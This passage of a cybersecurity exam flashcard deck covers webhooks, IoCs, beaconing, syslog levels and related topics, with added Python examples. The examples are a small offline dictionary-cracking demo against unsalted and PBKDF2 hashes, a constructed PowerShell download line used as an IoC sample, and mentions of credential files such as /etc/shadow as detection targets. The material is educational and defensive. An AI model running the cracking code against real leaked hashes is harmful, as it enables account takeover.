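WORDLIST = ["123456", "password", "qwerty", "letmein", "Spring2024!", "welcome1"]
LEAKED_SHA256 = hashlib.sha256(b"letmein").hexdigest()

PBKDF2_ITERATIONS = 600_000   # OWASP (2023) recommendation for PBKDF2-HMAC-SHA256


def crack_unsalted(digest_hex: str, wordlist, algo="sha256"):
    """Offline guess-and-compare: no login attempts, so nothing for UBA to see.
    One cheap hash per guess, and identical passwords share identical digests."""
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == digest_hex:
            return word
    return None


def hash_password(password: str, iterations=PBKDF2_ITERATIONS) -> str:
    """Store as algorithm$iterations$salt$hash so the parameters travel with the record."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_record(record: str, wordlist):
    """Same attack against the salted, iterated record: it still succeeds for a weak
    password, but every guess now costs `iterations` HMACs and precomputed tables are useless."""
    for word in wordlist:
        if verify_password(word, record):
            return word
    return None


if __name__ == "__main__":
    print("unsalted:", crack_unsalted(LEAKED_SHA256, WORDLIST))
    rec = hash_password("letmein", iterations=10_000)   # low count so the demo is quick
    print("salted:  ", crack_record(rec, WORDLIST))
    print("same password, two records:", hash_password("letmein")[:48], hash_password("letmein")[:48])
```

Neither function touches the network or the target system, which is the whole point of the card: the only behavioral signal you will see is the eventual use of the cracked credential, so monitoring for the theft of the hash store (for example, reads of NTDS.dit or /etc/shadow) is where detection has to happen.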

102
Q

You are a cyber security consultant in your company. You are educating developers regarding the use of webhooks when developing applications.

Which of the following scenarios would not be a suitable use for webhooks?

A)Automatically forwarding customer payments from an e-commerce platform to the accounting department

B)Deleting or updating data on other systems or databases.

C)Sending an email to a developer to request a fix for a non-urgent issue.

D)Notifying the customer support team when customers raise a payment dispute

A

Webhooks would not be suitable for deleting or updating data on other systems or databases. An API is the interface of an application that permits other programs to request, input, delete, or update data in that application. A webhook is an HTTP POST that one application sends to a URL exposed by another application's API; the message is triggered in response to a user-defined event that occurs in the sending application.

APIs and webhooks are used to accomplish similar goals, but in different ways. While an API call is how a program directs another system to do something (for example, create an order), a webhook is how a system informs another that an event has occurred; the receiver then decides what action to take in response, such as sending an email or creating a calendar event.

103
Q

What scenarios that webhooks are suitable for?

A

Webhooks are suitable in a number of scenarios, which include but are not limited to:

Notifying the customer support team when customers raise a payment dispute.
Automatically sending invoices to the accounting department after customers pay via an e-commerce platform.
Sending an email to a developer to request a fix for a non-urgent issue.

Webhooks are used to automate workflows. Other real-world scenarios where webhooks can be used would include:

Notifying an agent in a chat application when a query is sent in the chatbot engine.

Automatically sending an email to a marketing team via customer relationship management (CRM) software when a customer makes a purchase or exits a shopping cart without buying.

Receiving automatic email reminder notifications from your calendar application on your phone.

Automatically uploading photos from one social media platform to another, such as from Instagram to Twitter.
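
A webhook receiver for the payment scenario in card 51 and the event-driven uses in cards 102 and 103, as an added Python example that is not part of the original deck. It shows the three checks a practitioner wants before a notification is allowed to change a subscription: authenticate the delivery (timestamp-bound HMAC, so a captured message cannot be replayed later), deduplicate it (providers retry), and act only on the success event type. The secret, the header names, the signing scheme ("timestamp.body", modelled on common provider designs) and the event shape are assumptions; check your provider's documentation for the real ones.

```python
import hashlib
import hmac
import json
import time

# Assumptions: the payment provider signs each delivery with a shared secret
# over "<timestamp>.<raw body>" and sends the timestamp and hex HMAC-SHA256
# in headers (names here are hypothetical; check your provider's docs).
WEBHOOK_SECRET = b"whsec_example_only"
TOLERANCE_SECONDS = 300


def sign(body: bytes, ts: int, secret: bytes = WEBHOOK_SECRET) -> str:
    return hmac.new(secret, f"{ts}.".encode() + body, hashlib.sha256).hexdigest()


def verify(body: bytes, ts_header, sig_header, now: int,
           secret: bytes = WEBHOOK_SECRET) -> bool:
    """Reject stale deliveries (replay) and compare the MAC in constant time."""
    try:
        ts = int(ts_header)
    except (TypeError, ValueError):
        return False
    if abs(now - ts) > TOLERANCE_SECONDS:
        return False
    return hmac.compare_digest(sign(body, ts, secret), sig_header or "")


class SubscriptionStore:
    """Stand-in for the application's database."""
    def __init__(self):
        self.plan = {}            # user_id -> "trial" | "paid"
        self.seen_events = set()


def handle_webhook(store: SubscriptionStore, headers: dict, body: bytes, now: int):
    """Endpoint logic: authenticate, deduplicate, then act only on success events."""
    if not verify(body, headers.get("X-Webhook-Timestamp"),
                  headers.get("X-Webhook-Signature"), now):
        return 401, "invalid signature"
    event = json.loads(body)
    if event["id"] in store.seen_events:          # providers retry; stay idempotent
        return 200, "duplicate ignored"
    store.seen_events.add(event["id"])
    user = event["data"]["user_id"]
    if event["type"] == "payment.succeeded":
        store.plan[user] = "paid"
        return 200, f"{user} upgraded"
    # payment.failed, checkout.expired, etc.: record, but never change the plan
    return 200, f"{event['type']} recorded, no change"


def make_delivery(event: dict, ts: int, secret: bytes = WEBHOOK_SECRET):
    """What the provider would send: raw body plus signature headers."""
    body = json.dumps(event, separators=(",", ":")).encode()
    return {"X-Webhook-Timestamp": str(ts), "X-Webhook-Signature": sign(body, ts, secret)}, body


if __name__ == "__main__":
    store = SubscriptionStore()
    store.plan["u42"] = "trial"
    now = int(time.time())
    ok = {"id": "evt_1", "type": "payment.succeeded", "data": {"user_id": "u42", "amount": 4900}}
    print(handle_webhook(store, *make_delivery(ok, now), now), store.plan)
```

Verify over the raw request bytes, not over a re-serialized JSON object: any whitespace or key-order change between what the provider signed and what you hash will make valid deliveries fail, and developers who hit that problem tend to "fix" it by disabling the check.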

104
Q

Which of the following are NOT examples of open-source threat intelligence? (Choose all that apply.)

A)deep/dark web
B)US-CERT
C)commercial threat data feeds
D)OWASP
E)internal cybersecurity response team

A

Commercial (private) threat data feeds are a good source of threat intelligence, but they are not considered open source because they are only available to paid partners. Threat intelligence can also sometimes be obtained from internal sources such as the organization’s cybersecurity response team, but these are not considered open source because they are not available to all.

105
Q

You are in the process of completing final documentation of an incident investigation. You are classifying all of the symptoms exhibited during the incident. One of the symptoms of the target machine was unusually high memory consumption. Which of the following incident types could cause this condition?

A)malware
B)privilege escalation
C)data exfiltration
D)dictionary attack

A

High memory consumption is considered a host-related symptom. It typically indicates the presence of malware. Host-related symptoms are those related to use of resources on the host that will be recorded in the local logs of a device. Unusual processor or memory consumption could be determined by using a resource monitor on the device. If either of these symptoms occur, then you should suspect a malicious process is using the processing resources or memory. The best course of action is to scan the device for malware.

Common host-related symptoms include unusual processor consumption, memory consumption, or drive capacity consumption; unauthorized software and malicious processes; unauthorized changes and privileges; and data exfiltration.

Issues with drive capacity consumption could also be determined by using a resource monitor on the device. When this symptom occurs, you should suspect that some malicious process is filling the drive as part of a DoS attack. Again, the best course of action is to scan the device for malware.

Unauthorized software could be detected with a vulnerability scan that identifies unauthorized software. When discovered, you should suspect that a malicious individual has compromised the device, even if the unauthorized software is not classified as malware. Some legitimate third-party software has known vulnerabilities that put your entire network at risk if it is installed. The best course of action is to re-image the device using the latest snapshot, if available. To ensure security, you should use a policy that prevents the installation of unauthorized software and ensure that users are trained in safe practices.

Malicious processes could be detected by using a tool like Process Explorer. You should suspect the presence of malware if you notice unusual processor, memory, or drive capacity usage on a host. The best course of action is to scan the device using anti-malware software. If you are unable to remove the malicious software, you should re-image the device using the latest snapshot, if available, and ensure that anti-malware programs are kept up to date.

Unauthorized changes could be discovered by performing a compliance scan in which the current device settings are compared to a baseline. When it occurs, you should suspect that the device has been compromised. You should attempt to restore the device to the correct settings and remove any unauthorized permissions that have been granted. You may need to re-image the device using the latest snapshot, if available. Ensure that users are trained in safe practices and that user accounts are hardened against privilege escalation.

The general recommendation for all host-related attacks is to keep anti-malware up to date and ensure that all users are trained in safe practices.

106
Q

The team is analyzing IoCs and categorizing them by their source. Which of the following is NOT an example of a host-related IoC?

A)abnormal operating system behavior

B)file system changes or anomalies

C)unauthorized scheduled tasks

D)registry changes or anomalies

E)unusual traffic spikes

A

Unusual traffic spikes is a network-related indicator of compromise (IoC). It can indicate a denial-of-service (DoS) attack is underway.

Abnormal operating system behavior, such as an unexpected reboot, is a host-related IoC.

File system changes made in an unauthorized manner and system anomalies (actions taken by the system that are statistically unusual as determined by an algorithm) are host-related IoCs.

Unauthorized changes to the registry settings or settings that are statistically unusual as determined by an algorithm (registry anomalies) can indicate either malicious changes or mistakes in configuration. This is also considered a host-based IoC.

Unauthorized scheduled tasks are automated operations that have been configured by an unauthorized individual. While scheduling tasks is a function that can be quite helpful in taking care of mundane and repetitive maintenance tasks, when they are configured by an unauthorized person, it is a host-related IoC.

107
Q

Which protocol, or logical design could you implement in your network to ensure that events logged from multiple devices have the correct time synchronization?

A)NTP
B)SASE
C)SDN
D)MFA

A

A Network Time Protocol (NTP) server allows devices to synchronize their clocks using a common source. Accurate time synchronization is important to corroborate events and to follow the sequence of events that occurred in an attack. Record timestamps in UTC, or include the UTC offset, so that logs from devices in different time zones line up once they are aggregated.

108
Q

Recently there was a DoS attack on one of the servers, which succeeded in taking the server down for three hours. You would like to deploy a solution that would allow you to detect a huge rush of traffic to a specific device and route it somewhere away from the device. What technique could you use?

A)Network segmentation
B)System isolation
C)Endpoint security
D)Sinkholes

A

You could use a sinkhole. A sinkhole is a routing mechanism that can route traffic from a device being flooded to a location where the traffic can be studied.

109
Q

After a recent DoS attack, you discovered that one of your internal devices that can be reached externally has command and control software installed on it that allows it to send instructions to other devices in your network. What type of arrangement is this called?

A)sinkhole
B)honeypot
C)peer-to-peer botnet
D)rogue device

A

In a peer-to-peer botnet, devices that can be reached externally are compromised and have command and control (C&C) software installed on them, so that they act as C&C servers for the other bots rather than relying on a single central server. The compromised devices then carry out attacks. The best course of action is to identify whether a botnet is present, and if so, to check ALL devices for malware.

If you discover a case of illegal peer-to-peer software, then ensure that devices are scanned for unauthorized software on a regular basis. You should also keep all anti-malware programs up to date and ensure that users are trained in safe practices.

This is not a rogue device because it is a known device being managed. Rogue devices by definition are unknown and unmanaged.

This is not a sinkhole. A sinkhole is a target to which hostile traffic can be directed that provides an appropriate place to analyze the traffic.

This is not a honeypot. A honeypot is a device made to be attractive to hackers and designed to engage them so that evidence can be gathered about them.

110
Q

Which of the following decrypts and opens incoming encrypted traffic, examines the contents for threats, and, providing there are no issues, re-encrypts the traffic for delivery?

A)Cloud access security broker
B)Public key infrastructure
C)Zero trust
D)Secure sockets layer (SSL) inspection

A

Secure sockets layer (SSL) inspection decrypts and opens incoming encrypted traffic, examines the contents for threats, and, providing there are no issues, re-encrypts the traffic for delivery. Because the protocol in use today is almost always TLS, the feature is also called TLS inspection or TLS interception. It works by having the inspecting device terminate the session and present its own certificate to the client, so every client must trust the inspection device's CA, and the decrypted traffic on that device must be handled and logged with care.

111
Q

Which of the following divides the network at Layer 2 or Layer 3 to create security barriers in the network?

A)Cloud
B)Network segmentation
C)Software-defined networking
D)Zero trust

A

Network segmentation involves dividing the network at either Layer 2 or Layer 3 to create desirable security barriers between devices in the network. It cannot route traffic from a device being flooded to a location where the traffic can be studied.

112
Q

Of the choices below, what would you find in the /etc/ directory?

A)System processes
B)Linux configuration files
C)Windows registry
D)Containerization

A

You would find Linux configuration files in the /etc/ directory. In Linux, most applications and services keep their own configuration files, and the Linux file system hierarchy uses the /etc/ directory as the location for system-wide configuration (for example /etc/ssh/sshd_config or /etc/passwd). Running processes are exposed under /proc/, not /etc/.

113
Q

Your team recently suffered several attacks that leveraged the use of programming and scripting languages. They are investigating these languages. Which of the following is a lightweight formatted script designed for data transfer in which data is represented in name/value pairs separated by a comma?

A)XML
B)Python
C)PowerShell
D)JavaScript Object Notation (JSON)

A

JSON is an open standard file and data interchange format that uses human-readable text to store and transmit data objects consisting of attribute-value pairs and arrays.

114
Q

XML

A

Extensible Markup Language (XML) is a markup language and file format for storing, transmitting, and reconstructing data. It makes use of tags to delimit elements.

115
Q

Python

A

Python is a programming language that uses a new line to end a statement and indentation to group blocks, as opposed to many other programming languages, which use semicolons to end statements and braces to group blocks.

116
Q

PowerShell

A

PowerShell is an object-oriented automation engine and scripting language that features an interactive command-line shell that operates within Microsoft Windows. PowerShell was developed to help IT professionals configure systems and automate administrative tasks on Windows machines. Unlike other command-line shells that are based on text, PowerShell works with objects instead.

117
Q

You are exploring the attack surface of a Windows 10 host. Which scripting environment is an automation standard for modern Windows systems?

A)VBA
B)Java
C)Bash
D)PowerShell

A

PowerShell is the automation standard for modern Windows systems. It is installed by default on Windows 10 and Windows Server, and it exposes the operating system, Active Directory, and Microsoft's management interfaces as cmdlets. For the same reasons it is heavily used by attackers for post-exploitation, so its execution policy and its script block and module logging are part of the host's attack surface.

VBA runs only inside Office applications, Java is a general-purpose programming language rather than a scripting environment, and Bash is the native shell of UNIX and Linux systems.

118
Q

Bash

A

Bash (Bourne-Again Shell) is a common built-in command-line shell for UNIX and Linux systems.

119
Q

Java

A

Java is a class-based, object-oriented programming language that is designed to have as few implementation dependencies as possible. It is a general-purpose programming language.

120
Q

VBA

A

Office Visual Basic for Applications (VBA) is an event-driven programming language that enables you to extend Office applications.

121
Q

The team is using a tool to search for IoCs in a script. Which of the following is a sequence of characters that can be used to specify a match pattern in text?

A)the # character
B)XML
C)regular expressions
D)JSON

A

Regular expressions are sequences of characters that specify match patterns in text. Their syntax takes some learning, but the following examples show the quantifier forms most often used when searching for IoCs:

a{5} will match “aaaaa”
n{3} will match “nnn”
[a-z]{4} will match any run of four lowercase letters, such as “door”, “room” or “book” (it also matches the first four letters of a longer word unless it is anchored with word boundaries, as in \b[a-z]{4}\b)
[a-z]{6,} will match any run of six or more lowercase letters

Extensible Markup Language (XML) is a markup language and file format for storing, transmitting, and reconstructing data. It makes use of tags to delimit elements.

The # character begins a comment in shell scripts (and in Python and PowerShell): everything from the hash symbol (#) to the end of the line is ignored by the interpreter. JSON has no comment syntax at all, so a # inside a JSON document is either data within a string or a syntax error.

JSON is an open standard file and data interchange format that uses human-readable text to store and transmit data objects consisting of attribute-value pairs and arrays.
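The patterns above, run against a constructed sample string, as an added example that is not part of the original flashcard deck. The block then applies the same idea to the card's scenario of hunting IoCs in a script: the sample text, the PowerShell fragment and the addresses in it (RFC 5737 documentation ranges) are all constructed for this illustration.

```python
import re

# Constructed sample text (not from the original page), chosen so that each
# pattern from the card has something to match.
SAMPLE = "aaaaa nnn door room book window a{5} aaaa"


def find_all(pattern: str, text: str = SAMPLE) -> list[str]:
    """Return every non-overlapping match of `pattern` in `text`."""
    return re.findall(pattern, text)


def card_examples() -> dict[str, list[str]]:
    """The four patterns from the card, written without stray spaces.
    (A pattern such as "a {5}" would instead require five spaces after the a.)"""
    return {
        "a{5}": find_all(r"a{5}"),
        "n{3}": find_all(r"n{3}"),
        "[a-z]{4}": find_all(r"[a-z]{4}"),   # also matches fragments of longer words
        "[a-z]{6,}": find_all(r"[a-z]{6,}"),
    }


def whole_words(length: int, text: str = SAMPLE) -> list[str]:
    """Whole words of exactly `length` lowercase letters. The \\b anchors stop
    "aaaaa" and "window" from contributing four-letter fragments."""
    return re.findall(rf"\b[a-z]{{{length}}}\b", text)


# Hypothetical script fragment in which to hunt for IoCs (constructed; the
# addresses are RFC 5737 documentation ranges, not real hosts).
SCRIPT = r"""
$u = "http://203.0.113.10/update.ps1"
Invoke-WebRequest $u -OutFile C:\Users\Public\u.ps1
ping 198.51.100.7
"""

IPV4 = r"\b(?:\d{1,3}\.){3}\d{1,3}\b"
URL = r"https?://[^\s\"']+"


def extract_ipv4(text: str = SCRIPT) -> list[str]:
    """Dotted-quad candidates; validate octet ranges before acting on them."""
    return re.findall(IPV4, text)


def extract_urls(text: str = SCRIPT) -> list[str]:
    """http(s) URLs up to the next whitespace or quote character."""
    return re.findall(URL, text)


if __name__ == "__main__":
    for pattern, hits in card_examples().items():
        print(f"{pattern:10} -> {hits}")
    print("whole 4-letter words:", whole_words(4))
    print("IPv4 IoCs:", extract_ipv4())
    print("URL IoCs:", extract_urls())
```

The [a-z]{4} result is the point worth noticing: without \b it reports "aaaa" and "wind", which are fragments rather than words, and the same mistake in an IoC search produces hits inside longer identifiers.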

122
Q

While performing a regular analysis of the firewall log, you discover that there is traffic leaving your network at regular intervals from the same device to the same destination. What is this type of traffic called?

A)ping sweep
B)probe request
C)peer-to-peer
D)beaconing

A

Beaconing refers to traffic that leaves your network at regular intervals. This type of traffic could be generated by compromised hosts that are attempting to communicate with (or call home to) the malicious party that compromised the host. The compromised hosts do this in response to the command and control software that is running on the hacker’s device. The best course of action is to identify the destination of the traffic and block it at the firewall. Beaconing indicates some sort of malware or compromise is present, so the best course of action is to remove all malware, and if the device still does not function properly after the malware removal, then re-image the device. You should also keep all anti-malware up to date and ensure that users are trained in safe practices.

This is not a ping sweep. A ping sweep would touch the device only once. Ping sweeps use ICMP to identify all live hosts by pinging all IP addresses in the known network. All devices that answer the ping are known to be up and running. The symptoms of this attack are unusual spikes in network traffic. These sweeps can be detected by intrusion detection systems (IDS) and intrusion prevention systems (IPS). They indicate an attempt to map your network. The best course of action is to identify the source of the sweeps. Going forward, you should also deploy an IPS or IDS, if not already present.

This is not a probe request. A probe request is a wireless management frame sent by a station to discover nearby access points, including those that are not broadcasting their SSID. It is a link-layer transmission within the WLAN and would not appear in a firewall log as outbound traffic to a fixed external destination.

This is not peer-to-peer traffic. Peer-to-peer traffic occurs between peers within your network or with hosts outside the network. This traffic would not be at regular intervals.

123
Q

Your syslogs have too many entries, and it is difficult to isolate security events that require immediate attention. Which of the following logging levels would you want to exclude in order to fine-tune log ingestion?

A)Alert
B)Critical
C)Emergency
D)Notice

A

You would want to exclude the Notice logging level. Notice (severity 5 on the syslog scale) is used for normal but significant conditions that would not normally raise a security concern; Informational and Debug are even less urgent and are usually excluded as well.

Logging levels are classifications that indicate the severity or urgency of the logged event. The syslog levels, from most to least urgent, are Emergency, Alert, Critical, Error, Warning, Notice, Informational, and Debug. Log ingestion is the process of aggregating the logs collected from various devices across the network.

An Emergency logging level would indicate a critical system failure, which you would want to see in a syslog.

An Alert logging level indicates a condition that requires immediate action, such as a potential security threat.

A Critical logging level would indicate a serious system error.

124
Q

Which of the following is NOT an example of active defense?

A)dynamically changing network topologies
B)honeypots
C)rotating IP addresses
D)encrypting data at rest

A

Encrypting data at rest is not considered an active defense. An active defense either changes something in reaction to an indicator of compromise (IoC) or presents an immediate challenge or distraction to the IoC.

Rotating IP addresses for sensitive assets is a form of active defense and is designed to make it more difficult to fingerprint a system, which includes capturing its IP addresses.

Dynamically changing the network topologies in response to the appearance of an IoC is a form of active defense. For example, a router might respond to the appearance of an IoC by shutting down an interface and placing a new route in the routing table, thereby routing traffic around the area where the IoC was detected.

A honeypot is a network device made to be attractive to hackers and designed to engage them so that evidence can be gathered about their methods and avenues of attack.

125
Q

The team has isolated a piece of unusual software and is attempting to use a decompiler on it. What operations are they performing?

A)Salting
B)Decomposition
C)Hashing
D)Fingerprinting

A

One method of decomposing software is to use a decompiler to reconstruct an approximation of the high-level source code from the binary. The result can then be analyzed by an analyst who understands that language. Hashing and fingerprinting only identify a sample; they do not reveal what it does.

126
Q

Nessus

A

The tool displayed is Nessus, a widely used vulnerability scanner. It shows the vulnerabilities found by the tool and color-codes them by severity, as shown on the graphic.

127
Q

Metasploit

A

Metasploit is an exploitation framework used to develop, test, and launch exploits and payloads against target systems during penetration tests.

128
Q

During which of the following IoC-handling processes would the assistance of NIST Special Publication 800-61 be invaluable?

A)application
B)collection
C)all of these processes
D)analysis

A

National Institute of Standards and Technology (NIST) Special Publication 800-61, the Computer Security Incident Handling Guide, provides guidelines for all stages of handling Indicators of Compromise (IoC), including collection, analysis, and application.

129
Q

You suspect that a device has been compromised and is communicating with a remote C&C server. Which of the following symptoms would be indicative of this?

A)The device is suddenly unavailable

B)Traffic leaving your network at regular intervals from the same device to the same destination

C)An unusually high number of ping requests to multiple hosts on your network within a short time frame

D)An unusual spike in network traffic

A

The activity described is called beaconing. Beaconing refers to traffic leaving your network at regular intervals from the same device to the same destination. This type of traffic could be generated by compromised hosts that are attempting to communicate with (or call home to) the malicious party that compromised the host. Hosts attempt to communicate with what is called a command and control (C&C) server. The best course of action is to first identify the destination of the traffic and block it at the firewall. It indicates some sort of malware or compromise so you should also remove all malware. If the device still does not function properly after the malware removal, then re-image the device. You should also keep all anti-malware up to date and ensure that users are trained in safe practices.

130
Q

How can Ping sweeps be detected?

A

IPS and IDS
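The two network-related symptoms from the preceding cards, beaconing (same device to the same destination at regular intervals) and a ping sweep (one source touching many hosts in a short time), as detection logic run over firewall log lines. This is an added example, not part of the original deck; the log format, the field names and all addresses are constructed for it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Hypothetical firewall log format: "<iso-timestamp> src=.. dst=.. proto=.. ..."
LINE_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) proto=(\S+)")


def constructed_log() -> list[str]:
    """Synthetic log: one host beaconing every 300 s to one destination, one
    host ping-sweeping 12 internal addresses, plus irregular browsing noise."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    lines = []
    for i in range(6):                     # beacon: fixed 300 s interval
        t = t0 + timedelta(seconds=300 * i)
        lines.append(f"{t.isoformat()} src=10.0.0.5 dst=203.0.113.9 proto=tcp dport=443")
    for i in range(12):                    # sweep: 12 echo requests in 22 s
        t = t0 + timedelta(seconds=2 * i)
        lines.append(f"{t.isoformat()} src=10.0.0.77 dst=10.0.1.{i + 1} proto=icmp type=8")
    for sec in (7, 95, 130, 400, 1111, 1400):   # noise: irregular gaps
        t = t0 + timedelta(seconds=sec)
        lines.append(f"{t.isoformat()} src=10.0.0.8 dst=198.51.100.4 proto=tcp dport=443")
    return lines


def parse(lines):
    """Return (timestamp, src, dst, proto) tuples, skipping unparseable lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts, src, dst, proto = m.groups()
            events.append((datetime.fromisoformat(ts), src, dst, proto))
    return events


def find_beacons(events, min_hits=5, max_cv=0.1) -> dict:
    """(src, dst) pairs whose inter-connection gaps are nearly constant.
    The coefficient of variation (stdev / mean) is near 0 for a fixed timer."""
    by_pair = defaultdict(list)
    for ts, src, dst, _proto in events:
        by_pair[(src, dst)].append(ts)
    beacons = {}
    for pair, times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[pair] = avg
    return beacons


def find_ping_sweeps(events, window_s=60, min_targets=10) -> dict:
    """Sources that sent ICMP to at least min_targets distinct hosts within
    any window_s-second window; value is the number of targets seen."""
    by_src = defaultdict(list)
    for ts, src, dst, proto in events:
        if proto == "icmp":
            by_src[src].append((ts, dst))
    sweeps = {}
    for src, hits in by_src.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            targets = {d for t, d in hits[i:] if (t - start).total_seconds() <= window_s}
            if len(targets) >= min_targets:
                sweeps[src] = len(targets)
                break
    return sweeps


if __name__ == "__main__":
    ev = parse(constructed_log())
    print("beacons:", find_beacons(ev))
    print("ping sweeps:", find_ping_sweeps(ev))
```

Real implants add jitter to their sleep timer precisely to defeat this check; raising max_cv catches them at the cost of flagging legitimate polling such as update checks, so the destination should still be reviewed before it is blocked at the firewall.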

131
Q

After a security breach occurred this morning, the cyber team is trying to identify all network-related symptoms of the event. Which of the following is NOT a network-related symptom of an attack?

A)Scan sweeps
B)Rogue devices on the network
C)Bandwidth consumption
D)Malicious processes

A

The presence of malicious processes is a host-related symptom, not a network-related symptom. Common network-related symptoms of incidents are bandwidth consumption, beaconing, irregular peer-to-peer communication, rogue devices on the network, scan sweeps, and atypical traffic spikes.

Malicious processes are located on devices, and thus are considered a host-related symptom. Common host-related symptoms include unusual processing consumption, memory consumption, or drive capacity consumption; unauthorized software and malicious processes; unauthorized changes and privileges; and data exfiltration. The general recommendation for all host-related attacks is to keep anti-malware up to date and ensure that all users are trained in safe practices.

Unusual processor or memory consumption could be determined by using a resource monitor on the device. If either of these symptoms occurs, you should suspect a malicious process is using the processing resources or memory. The best course of action is to scan the device for malware.

Issues with drive capacity consumption could also be determined by using a resource monitor on the device. When this symptom occurs, you should suspect that some malicious process is filling the drive as part of a DoS attack. Again, the best course of action is to scan the device for malware.

Unauthorized software could be detected with a vulnerability scan that identifies unauthorized software. When discovered, you should suspect that a malicious individual has compromised the device, even if the unauthorized software is not classified as malware. Some legitimate third-party software has known vulnerabilities that put your entire network at risk if it is installed. The best course of action is to re-image the device using the latest snapshot, if available. To ensure security, you should use a policy that prevents the installation of unauthorized software and ensure that users are trained in safe practices.

Malicious processes could be detected using a tool like Process Explorer. You should suspect the presence of malware if you notice unusual processor, memory, or drive capacity usage on a host. The best course of action is to scan the device using anti-malware software. If you are unable to remove the malicious software, then you should re-image the device using the latest snapshot, if available, and ensure that anti-malware programs are kept up to date.

Unauthorized changes could be discovered by performing a compliance scan in which the current device settings are compared to a baseline. When it occurs, you should suspect that the device has been compromised. You should attempt to restore the device to the correct settings and remove any unauthorized permissions that have been granted. You may need to re-image the device using the latest snapshot, if available. Ensure that users are trained in safe practices and that user accounts are hardened against privilege escalation.

Unauthorized privileges could be discovered by examining the event log to determine which users are performing these privileged acts. If the user can be identified, then disciplinary action should be taken. If not, then the best course of action is to scan the device for malware and for compliance to the baseline. Ensure that users are trained in safe practices and that user accounts are hardened against privilege escalation.

Data exfiltration can be discovered with DLP software, if present. If not, then data exfiltration may be discovered only when it falls into the wrong hands. The best course of action is to identify the source of the disclosure, if possible, and then take disciplinary action and employ a DLP solution in the enterprise.

132
Q

You are an information security analyst for your company. You have been asked to identify IT business functions where tasks or processes could be automated to increase the speed and effectiveness of your team’s response to security incidents.

Which of the following processes should you evaluate as candidates for automation? (Choose all that apply.)

A)Processes that correspond to your identified threat models

B)Frequently executed processes

C)Processes that take a long time to execute

D)Processes that require human intervention

E)Rarely executed processes

F)Processes in a security response playbook

G)Processes that do not require human intervention

H)Processes that involve business-critical systems

A

You would evaluate the following processes to verify whether they are suitable for automation:

Frequently executed processes

Processes in a security response playbook

Processes that do not require human intervention

Processes that correspond to relevant threat models

Repeated and repeatable tasks that are frequently executed in the same way using the same parameters are strong candidates for automation. The benefit of automating these tasks is the amount of human time and attention freed up for other duties, such as threat analysis. You would not automate rarely executed processes because doing so would not be a net gain of efficiency in operations.

Processes in a security playbook and processes that correspond to relevant threat models should also be automated where feasible. These processes have already been identified as best practices for the team to follow in response to specific types of incidents. Automated threat detection and response can both increase the speed of incident discovery and halt a threat before it has time to advance further than the perimeter of the attack surface.

Processes that do NOT require human intervention, such as continually monitoring the status of all endpoints connected to a secure internal network, are also best suited for automation. For example, if an unknown device is discovered, automated processes can alert a human technician and send all related telemetry data for analysis.

Finally, processes that correspond to threat models identified as relevant to your organization should be evaluated for automation. While other types of IT-related processes can be automated, doing so will not improve overall security operations.

Cybersecurity will always require human engagement, and you would not look to automate tasks that require human judgement or intervention. However, you would always want to automate tasks to provide the human analysts with supporting information regarding any alert or incident, such as automatically finding the GPS location of a mobile device being used for a suspicious login.

Whether a process involves a business-critical system or takes a long time to execute does not factor into how suitable it is for automation.

133
Q

Which concept allows customers of different cell phone services to communicate with each other?

A)Privileged access management

B)Multi-factor authentication

C)Single sign-on

D)Federation

A

Federation allows customers of different cell phone services to communicate with each other. While each network has its own infrastructure, devices such as routers and gateways as well as network services are uniformly configured to a common standard. In general, federation allows members of disparate networks to communicate with each other.

134
Q

You have several SQL servers that were recently brought down by a DDoS attack. The attack was never detected by your signature-based IPS. When you received support from your vendor, you were told that the attack used an approach that was never seen before. What type of attack did you suffer?

A)known

B)zero-day

C)passive

D)APT

A

A zero-day attack is one discovered in live environments for which no current fix or patch exists, as in this case.

135
Q

You have several servers to which you would like access to be possible only from a designated administrative workstation. Which of the following should you deploy?

A)Honeypot
B)VLAN
C)Jump box
D)Subnet

A

You should deploy a jump box. A jump server or jump box is a server that is used to access devices that have been placed in a secure network zone, such as a perimeter network (formerly referred to in documentation as a DMZ). The server would span the two networks to provide access from an administrative desktop to the managed device.

136
Q

You need to control access to a server in your network to ensure that only authorized computers and devices are able to communicate with it. You need certain devices that are members of the same Microsoft domain to access the server while ensuring that other devices do not. You need to implement the appropriate configuration to allow a few non-domain devices to authenticate and connect with the server.

Which concept is this, and what configuration is needed to make it happen?

A)Perimeter network, exception
B)System isolation, exception
C)Extranet, exception
D)Perimeter network, acknowledgement

A

This is an example of system isolation; in this case, it is Microsoft server isolation. The configuration required to allow the non-domain devices to be able to authenticate and connect with the server is called an exception.

Systems can be isolated from other systems through the control of communications with the device. By leveraging group policy settings, you can require that all communication with isolated servers must be authenticated and protected by using IPsec (and optionally encrypted as well). As group policy settings can only be applied to computers that are domain members, devices that are not domain members must be specified as exceptions to the rules controlling access to the device if they need access.

While it is true that entire networks can also be isolated from the network in general, this is not a perimeter network, and an acknowledgement is used on an intrusion detection system (IDS) to indicate that it has detected devices that are already known. A perimeter network is a network logically separate from the intranet where resources that will be accessed from the outside world are made available without requiring authentication. This type of network was previously referred to as a demilitarized zone (DMZ), but this term is no longer in common use.

This is also not a perimeter network with an exception. Exceptions are used with server isolation, not with perimeter networks.

This is not an extranet. An extranet contains resources available only to certain entities from the outside world through access that is secured with authentication. Exceptions are used with server isolation but not with extranets.

137
Q

Over the weekend, several servers began to suffer from a variety of issues. Which of the following is NOT an application-related issue?

A)service interruption

B)any issue with a reference in the Application log in Windows Event Viewer

C)file system changes

D)unexpected outbound communication

